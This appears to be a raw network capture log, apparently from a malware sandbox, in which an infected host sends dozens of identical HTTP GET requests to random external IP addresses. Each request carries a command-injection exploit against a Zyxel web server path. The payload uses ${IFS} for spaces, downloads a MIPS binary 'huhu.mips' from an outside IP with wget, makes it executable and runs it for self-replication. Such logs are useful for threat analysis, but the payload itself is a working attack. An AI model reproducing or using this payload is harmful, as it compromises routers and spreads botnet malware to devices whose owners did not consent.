                                            Feb 2, 2024 06:20:36.254178047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            470192.168.2.1555298149.152.66.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:36.254211903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            471192.168.2.1557808122.76.155.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:36.254247904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            472192.168.2.1543944191.60.182.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:36.254276991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            473192.168.2.155807262.3.18.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:36.254301071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            474192.168.2.1549104114.84.135.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:36.254616022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            475192.168.2.1537026205.73.125.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:37.258304119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            476192.168.2.155986494.4.57.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:37.258388042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            477192.168.2.1548738134.188.240.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:37.258418083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            478192.168.2.153890888.37.210.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:39.270181894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            479192.168.2.156067420.194.243.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:39.270201921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            480192.168.2.155284286.230.31.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:39.270240068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            481192.168.2.1542024191.253.82.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:39.270277977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            482192.168.2.1556172177.118.235.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:39.270306110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            483192.168.2.1547722114.216.140.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:39.270347118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            484192.168.2.1549112158.14.94.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:39.270400047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            485192.168.2.1536948154.210.176.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:39.270499945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            486192.168.2.1536304167.174.161.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:39.270556927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            487192.168.2.155001486.247.32.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:39.270612955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            488192.168.2.154742676.158.172.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:41.277771950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            489192.168.2.1557908149.35.0.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:41.277785063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            490192.168.2.155309064.163.91.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:41.277864933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            491192.168.2.1556042137.142.155.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:41.277916908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            492192.168.2.1537336176.37.181.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:42.282423019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            493192.168.2.155111637.53.98.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:43.285989046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            494192.168.2.1560728208.187.140.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:43.286000013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            495192.168.2.153692865.90.217.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:43.286015034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            496192.168.2.155943413.132.135.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:43.286045074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            497192.168.2.1552368109.224.233.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:43.286087036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            498192.168.2.154157279.200.50.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:43.286156893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            499192.168.2.155236849.222.186.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:44.290065050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            500192.168.2.1535100139.230.105.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:44.290102959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            501192.168.2.1549588186.174.17.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:44.290121078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            502192.168.2.155712231.170.174.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:44.290143967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            503192.168.2.1537048212.172.19.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:44.290194988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            504192.168.2.1535950217.246.31.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:44.290216923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            505192.168.2.156050232.8.207.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:44.290267944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            506192.168.2.1537488154.84.125.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:44.290309906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            507192.168.2.154431079.32.105.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:44.290333986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            508192.168.2.153908281.246.113.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:44.290371895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            509192.168.2.1542856150.211.146.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:44.290412903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            510192.168.2.153600093.32.121.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:44.290453911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            511192.168.2.153766218.5.89.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:44.290487051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            512192.168.2.155006447.38.173.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:44.290527105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            513192.168.2.1546154161.42.199.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:44.290561914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            514192.168.2.1555284162.137.166.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:44.290606976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            515192.168.2.1538076164.172.105.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:44.290638924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            516192.168.2.1549744184.69.146.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:44.290689945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            517192.168.2.1540416141.229.243.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:44.290710926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            518192.168.2.1541018206.165.216.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:44.290720940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            519192.168.2.1547984174.85.209.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:44.290775061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            520192.168.2.1558014167.35.0.218443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:44.291126966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            521192.168.2.155069644.115.130.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:45.294933081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            522192.168.2.1549026137.242.60.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:45.294960022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            523192.168.2.154288812.118.79.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:45.295000076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            524192.168.2.1542946166.30.252.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:45.295043945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            525192.168.2.1556392211.59.188.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:45.295105934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            526192.168.2.1543672142.131.46.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:46.299506903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            527192.168.2.153832859.183.209.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:46.299545050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            528192.168.2.1542028149.54.95.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:46.299614906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            529192.168.2.1546012177.74.167.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:46.299647093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            530192.168.2.153290479.150.232.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:47.304162979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            531192.168.2.154388282.41.69.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:47.304214954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            532192.168.2.153975817.94.239.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:47.304310083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            533192.168.2.1560408208.118.63.44443
                                            TimestampBytes transferredDirectionData
